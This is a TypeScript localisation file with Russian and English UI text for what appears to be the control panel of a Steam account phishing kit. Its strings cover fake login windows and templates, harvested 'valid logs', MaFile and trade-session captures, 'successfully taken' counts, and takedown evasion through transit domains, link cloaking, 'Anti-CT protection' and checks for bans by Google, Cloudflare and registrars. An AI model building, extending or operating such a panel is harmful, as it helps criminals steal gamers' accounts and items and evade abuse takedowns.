import { dashboardLanguage } from "./copy";

const RU = {
  headerEyebrow: "Инфраструктура",
  pageTitle: "Домены",
  pageSubtitle: "Ссылки, авторизации и состояние доменов в одном месте",
  listTitle: "Список доменов",
  domainsCount: "{count} доменов в панели",
  logsHeadline: "{count} логов",
  overviewLabel: "Сводка по доменам",
  summaryAll: "Всего доменов",
  summaryAllHint: "Доменов подключено к панели",
  summaryActive: "Активных",
  summaryActiveHint: "Принимают трафик прямо сейчас",
  summaryPaused: "Остановлено",
  summaryPausedHint: "На паузе, ссылки не открываются",
  summaryLinks: "Всего ссылок",
  summaryLinksHint: "Ссылок создано на всех доменах",
  healthLabel: "Состояние домена",
  domainOverview: "Обзор домена",
  onlineLabel: "Онлайн",
  filterStatus: "Фильтр",
  filterAll: "Все",
  filterActive: "Активные",
  filterPaused: "Остановленные",
  filterOwn: "Свои",
  filterTeam: "Командные",
  addDomain: "Добавить домен",
  check: "Проверить",
  add: "Добавить",
  cancel: "Отмена",
  continue: "Продолжить",
  backStep: "Назад",
  finish: "Завершить",
  checkOk: "Свободен. A-запись → {ip}",
  domainExistsTeam: "Домен уже добавлен в команду",
  domainExistsOpen: "Домен уже есть в списке — открываю",
  empty: "На текущий момент у вас нет доменов",
  emptyHint:
    "Добавьте первый домен — после прописывания NS-записей он перейдёт в активный статус и появится в этом списке.",
  emptyFiltered: "По заданным условиям доменов не найдено",
  wizardStepName: "Имя домена",
  wizardStepMethod: "Способ привязки",
  wizardStepBind: "Привязка",
  wizardNameTitle: "Добавить домен",
  wizardNameHint: "Укажите имя домена, после этого добавьте NS-записи в домен",
  wizardDomainLabel: "Доменное имя",
  wizardTransit: "Использовать как транзитный домен",
  wizardTransitTip:
    "Транзитный домен переадресовывает все запросы на другой (второй) домен. Это снижает риск бана первого домена, что позволяет поменять домен переадресации на другой в случае бана",
  wizardTransitExample: "domain1.com/mylink → domain2.com/mylink",
  wizardMethodTitle: "Выберите способ привязки",
  wizardMethodHint: "Добавление нового домена",
  wizardMethodIp: "IP адрес",
  wizardMethodCf: "Cloudflare",
  wizardBindTitle: "Привяжи домен",
  wizardBindIpHint: "Установи указанный ниже IP-адрес в «A» запись домена",
  wizardBindNsHint:
    "В записях домена должны быть только эти NS-сервера, никакие другие (другие удалить)",
  wizardIpLabel: "IP-адрес",
  wizardNs1: "NS1",
  wizardNs2: "NS2",
  wizardSuccessTitle: "Информация",
  wizardSuccessHeading: "Домен успешно добавлен в панель",
  wizardSuccessBody:
    "DNS обычно обновляется от нескольких минут до 24 часов. Проверить распространение можно на dnschecker.org.",
  paused: "Остановлен",
  team: "Командный",
  own: "Свой",
  linksCount: "Ссылки",
  createdAt: "Дата создания",
  views: "Просмотры",
  clicks: "Клики",
  auths: "Авторизации",
  validLogs: "Валидные логи",
  openLinks: "Перейти к ссылкам",
  createLink: "Создать ссылку",
  openDomain: "Открыть домен",
  back: "К списку",
  breadcrumbSites: "Мои домены",
  linksTitle: "Ссылки",
  noLinks: "Ссылок пока нет",
  linksEmptyTitle: "Ссылки ещё не созданы",
  linksEmptyHint: "Создай первую ссылку — она появится в этом списке.",
  linksPausedHint: "Домен на паузе — создание и редактирование ссылок недоступно",
  deleteDomain: "Удалить домен",
  confirmTitle: "Подтверждение",
  deleteConfirm:
    "Домен {domain} будет удалён вместе со всеми ссылками. Это действие нельзя отменить.",
  deleteLinkTitle: "Удалить ссылку",
  deleteLinkConfirm: "Ссылка станет недоступна. Это действие нельзя отменить.",
  colLink: "Ссылка",
  colAuthType: "Тип авторизации",
  linkPaused: "Остановлена",
  badgeIframe: "iFrame",
  linkCreateTitle: "Добавление ссылки",
  linkEditTitle: "Редактирование ссылки",
  tabMain: "Основные настройки",
  tabAdvanced: "Дополнительные опции",
  pathLabel: "Адрес страницы",
  optional: "необязательно",
  linkPathPlaceholder: "path (пусто = random)",
  templateLabel: "Шаблон",
  templateNotSelected: "Не выбран",
  templatePickTitle: "Выбор шаблона",
  templateSearch: "Найти шаблон…",
  templateSelect: "Выбрать шаблон",
  templateNoPreview: "Нет превью",
  noTemplates: "Нет шаблонов",
  windowLabel: "Окно авторизации",
  windowFakeWindow: "Фейк окно",
  windowCurrentWindow: "Текущее окно",
  windowNewWindow: "Новое окно",
  windowAboutBlank: "About:Blank",
  submitAdd: "Добавить",
  submitSave: "Сохранить",
  actionEdit: "Редактировать",
  actionDelete: "Удалить",
  advancedProtection: "Защита от КТ",
  useIframe: "Использовать IFrame",
  cloaking: "Заменять 1 символ в ссылке",
  afterLog: "Действие после авторизации лога",
  afterMafile: "Действие после авторизации MaFile",
  afterTrade: "Действие после авторизации Трейд-сессии",
  actionError: "Ошибка",
  actionRedirect: "Редирект",
  redirectUrlPlaceholder: "https://example.com",
  redirectUrlPlaceholderMafile: "https://steamcommunity.com/",
  redirectUrlRequired: "Укажите ссылку для редиректа",
  banStatus: "Статус:",
  banChecked: "Проверялся:",
  banUnknown: "нет данных",
  banGoogleOk: "не забанен в Google",
  banGoogleBad: "забанен в Google",
  banCloudflareOk: "не забанен в CloudFlare",
  banCloudflareBad: "забанен в CloudFlare",
  banWhoisOk: "не забанен регистратором",
  banWhoisBad: "забанен регистратором",
  searchPlaceholder: "Поиск домена",
  stateLoading: "Загружаем список доменов",
  stateLoadingHint: "Обычно это занимает несколько секунд",
  stateError: "Не удалось загрузить домены",
  stateRetry: "Повторить",
  refresh: "Обновить",
  hostKicker: "Хост",
  live: "В сети",
  offline: "Офлайн",
  factsTitle: "Подключение",
  healthTitle: "Проверки",
  bindLabel: "Привязка",
  bindIp: "IP",
  bindNs: "NS",
  copyValue: "Копировать",
  copied: "Скопировано",
  copyFailed: "Не удалось скопировать",
  openUrl: "Открыть",
  searchLinks: "Поиск ссылки",
  colPath: "Путь",
  colTemplate: "Шаблон",
  colWindow: "Окно",
  copyLink: "Копировать ссылку",
  linksFilteredEmpty: "Ничего не найдено",
  dangerZone: "Опасная зона",
  dangerZoneHint: "Удаление снимет домен и все ссылки. Восстановить их нельзя.",
  badgeCloaking: "Cloaking",
  badgeVpn: "VPN",
  addLink: "Добавить ссылку",
  shareDomain: "Поделиться доменом",
  pauseDomain: "Приостановить",
  resumeDomain: "Возобновить",
  domainMenu: "Действия с доменом",
  linkMenu: "Действия со ссылкой",
  linksOnDomain: "Ссылки на этом домене",
  linksJournalHint:
    "Чтобы посмотреть журнал авторизаций на конкретной ссылке — справа от неё в меню выбери «История авторизаций»",
  visitorsOnline: "{count} активных посетителей",
  domainAdded: "Домен добавлен {date}",
  linksMeta: "{count} ссылок",
  linkActive: "Активна",
  shareCopied: "Ссылка на домен скопирована",
  pauseDone: "Домен приостановлен",
  resumeDone: "Домен возобновлён",
  statsSiteVisits: "Переходов на сайт",
  statsAuthVisits: "Переходов на авторизацию",
  statsDataEntry: "Вводы данных",
  statsSuccessTaken: "Успешно сняты",
  statsPcShare: "Процент юзеров с ПК: {value}%",
  statsNoBreakdown: "Нет разбивки",
  statsAllTime: "За всё время",
  authHistory: "История авторизаций",
  resetStats: "Сбросить статистику",
  resetStatsConfirm: "Статистика этой ссылки будет обнулена. Продолжить?",
  resetStatsDone: "Статистика сброшена",
  journalTitle: "Журнал авторизаций",
  journalLive: "Обновляется автоматически",
  journalHint:
    "Чтобы увидеть дополнительную информацию, нажмите на иконку в левой части ячейки",
  journalInfo: "Информация",
  journalTime: "Время на сайте",
  journalEmpty: "Журнал пуст",
  journalEmptyHint: "Нет действий на странице авторизации",
  journalLoading: "Загружаем журнал",
  journalOnline: "Онлайн",
  windowPickTitle: "Окно авторизации",
  toastAddingDomain: "Добавляем домен в панель.",
  toastDeletingDomain: "Удаляем домен и все его ссылки.",
  toastCreatingLink: "Создаём ссылку на домене.",
  toastSavingLink: "Сохраняем настройки ссылки.",
  toastDeletingLink: "Удаляем ссылку.",
  linkDeleted: "Ссылка удалена",
  journalLoadError: "Не удалось загрузить журнал авторизаций",
} as const;

const EN: Record<keyof typeof RU, string> = {
  headerEyebrow: "Infrastructure",
  pageTitle: "Domains",
  pageSubtitle: "Manage domains, links and metrics",
  listTitle: "Domain list",
  domainsCount: "{count} domains in the panel",
  logsHeadline: "{count} logs",
  overviewLabel: "Domains overview",
  summaryAll: "Total domains",
  summaryAllHint: "Domains connected to the panel",
  summaryActive: "Active",
  summaryActiveHint: "Currently receiving traffic",
  summaryPaused: "Paused",
  summaryPausedHint: "Paused, links do not open",
  summaryLinks: "Total links",
  summaryLinksHint: "Links created across all domains",
  healthLabel: "Domain health",
  domainOverview: "Domain overview",
  onlineLabel: "Online",
  filterStatus: "Filter",
  filterAll: "All",
  filterActive: "Active",
  filterPaused: "Paused",
  filterOwn: "Own",
  filterTeam: "Team",
  addDomain: "Add domain",
  check: "Check",
  add: "Add",
  cancel: "Cancel",
  continue: "Continue",
  backStep: "Back",
  finish: "Finish",
  checkOk: "Available. A record → {ip}",
  domainExistsTeam: "Domain is already added to the team",
  domainExistsOpen: "Domain already exists — opening it",
  empty: "You have no domains yet",
  emptyHint:
    "Add the first domain — after NS records are set it becomes active and appears in this list.",
  emptyFiltered: "No domains match the selected filters",
  wizardStepName: "Domain name",
  wizardStepMethod: "Binding method",
  wizardStepBind: "Binding",
  wizardNameTitle: "Add domain",
  wizardNameHint: "Enter the domain name, then add NS records at your registrar",
  wizardDomainLabel: "Domain name",
  wizardTransit: "Use as transit domain",
  wizardTransitTip:
    "A transit domain forwards all requests to another (second) domain. This lowers the risk of the first domain being banned and lets you swap the redirect target if a ban happens.",
  wizardTransitExample: "domain1.com/mylink → domain2.com/mylink",
  wizardMethodTitle: "Choose binding method",
  wizardMethodHint: "Adding a new domain",
  wizardMethodIp: "IP address",
  wizardMethodCf: "Cloudflare",
  wizardBindTitle: "Bind domain",
  wizardBindIpHint: "Set the IP below as the domain A record",
  wizardBindNsHint:
    "Domain records must contain only these NS servers — remove any others",
  wizardIpLabel: "IP address",
  wizardNs1: "NS1",
  wizardNs2: "NS2",
  wizardSuccessTitle: "Information",
  wizardSuccessHeading: "Domain successfully added to the panel",
  wizardSuccessBody:
    "DNS usually updates within minutes to 24 hours. You can check propagation on dnschecker.org.",
  paused: "Paused",
  team: "Team",
  own: "Own",
  linksCount: "Links",
  createdAt: "Created",
  views: "Views",
  clicks: "Clicks",
  auths: "Auths",
  validLogs: "Valid logs",
  openLinks: "Open links",
  createLink: "Create link",
  openDomain: "Open domain",
  back: "Back to list",
  breadcrumbSites: "My domains",
  linksTitle: "Links",
  noLinks: "No links yet",
  linksEmptyTitle: "No links created yet",
  linksEmptyHint: "Create the first link and it will appear here.",
  linksPausedHint: "Domain is paused — link creation and editing are unavailable",
  deleteDomain: "Delete domain",
  confirmTitle: "Confirmation",
  deleteConfirm:
    "Domain {domain} will be deleted together with all links. This cannot be undone.",
  deleteLinkTitle: "Delete link",
  deleteLinkConfirm: "The link will become unavailable. This cannot be undone.",
  colLink: "Link",
  colAuthType: "Auth type",
  linkPaused: "Paused",
  badgeIframe: "iFrame",
  linkCreateTitle: "Add link",
  linkEditTitle: "Edit link",
  tabMain: "Main settings",
  tabAdvanced: "Advanced options",
  pathLabel: "Page path",
  optional: "optional",
  linkPathPlaceholder: "path (empty = random)",
  templateLabel: "Template",
  templateNotSelected: "Not selected",
  templatePickTitle: "Choose template",
  templateSearch: "Find template…",
  templateSelect: "Select template",
  templateNoPreview: "No preview",
  noTemplates: "No templates",
  windowLabel: "Auth window",
  windowFakeWindow: "Fake window",
  windowCurrentWindow: "Current window",
  windowNewWindow: "New window",
  windowAboutBlank: "About:Blank",
  submitAdd: "Add",
  submitSave: "Save",
  actionEdit: "Edit",
  actionDelete: "Delete",
  advancedProtection: "Anti-CT protection",
  useIframe: "Use iframe",
  cloaking: "Replace one character in the link",
  afterLog: "Action after log auth",
  afterMafile: "Action after MaFile auth",
  afterTrade: "Action after trade session auth",
  actionError: "Error",
  actionRedirect: "Redirect",
  redirectUrlPlaceholder: "https://example.com",
  redirectUrlPlaceholderMafile: "https://steamcommunity.com/",
  redirectUrlRequired: "Enter a redirect URL",
  banStatus: "Status:",
  banChecked: "Checked:",
  banUnknown: "no data",
  banGoogleOk: "not banned in Google",
  banGoogleBad: "banned in Google",
  banCloudflareOk: "not banned in CloudFlare",
  banCloudflareBad: "banned in CloudFlare",
  banWhoisOk: "not banned by registrar",
  banWhoisBad: "banned by registrar",
  searchPlaceholder: "Search domain",
  stateLoading: "Loading domains",
  stateLoadingHint: "This usually takes a few seconds",
  stateError: "Could not load domains",
  stateRetry: "Try again",
  refresh: "Refresh",
  hostKicker: "Host",
  live: "Live",
  offline: "Offline",
  factsTitle: "Connection",
  healthTitle: "Checks",
  bindLabel: "Binding",
  bindIp: "IP",
  bindNs: "NS",
  copyValue: "Copy",
  copied: "Copied",
  copyFailed: "Could not copy",
  openUrl: "Open",
  searchLinks: "Search links",
  colPath: "Path",
  colTemplate: "Template",
  colWindow: "Window",
  copyLink: "Copy link",
  linksFilteredEmpty: "Nothing found",
  dangerZone: "Danger zone",
  dangerZoneHint: "Deleting removes the domain and all links. This cannot be undone.",
  badgeCloaking: "Cloaking",
  badgeVpn: "VPN",
  addLink: "Add link",
  shareDomain: "Share domain",
  pauseDomain: "Pause",
  resumeDomain: "Resume",
  domainMenu: "Domain actions",
  linkMenu: "Link actions",
  linksOnDomain: "Links on this domain",
  linksJournalHint:
    "To view the authorization log for a specific link, open its menu and choose Authorization history",
  visitorsOnline: "{count} active visitors",
  domainAdded: "Domain added {date}",
  linksMeta: "{count} links",
  linkActive: "Active",
  shareCopied: "Domain link copied",
  pauseDone: "Domain paused",
  resumeDone: "Domain resumed",
  statsSiteVisits: "Site visits",
  statsAuthVisits: "Auth visits",
  statsDataEntry: "Data entries",
  statsSuccessTaken: "Successfully taken",
  statsPcShare: "PC users: {value}%",
  statsNoBreakdown: "No breakdown",
  statsAllTime: "All time",
  authHistory: "Authorization history",
  resetStats: "Reset statistics",
  resetStatsConfirm: "This will reset the link statistics. Continue?",
  resetStatsDone: "Statistics reset",
  journalTitle: "Authorization log",
  journalLive: "Updates automatically",
  journalHint: "Click the icon on the left of a row for extra details",
  journalInfo: "Information",
  journalTime: "Time on site",
  journalEmpty: "Journal is empty",
  journalEmptyHint: "No actions on the authorization page",
  journalLoading: "Loading journal",
  journalOnline: "Online",
  windowPickTitle: "Auth window",
  toastAddingDomain: "Adding the domain to the panel.",
  toastDeletingDomain: "Deleting the domain and all of its links.",
  toastCreatingLink: "Creating a link on this domain.",
  toastSavingLink: "Saving link settings.",
  toastDeletingLink: "Deleting the link.",
  linkDeleted: "Link deleted",
  journalLoadError: "Could not load the authorization log",
};

export type SitesCopyKey = keyof typeof RU;

export function sitesText(
  key: SitesCopyKey,
  variables: Record<string, string | number> = {},
): string {
  const table = dashboardLanguage() === "en" ? EN : RU;
  let value = table[key] || RU[key];
  const i18nKey = `sites.${key}`;
  if (!value && window.WorkerI18n?.t) {
    value = window.WorkerI18n.t(i18nKey, variables);
  }
  for (const [name, replacement] of Object.entries(variables)) {
    value = value.replace(new RegExp(`\\{${name}\\}`, "g"), String(replacement));
  }
  return value;
}
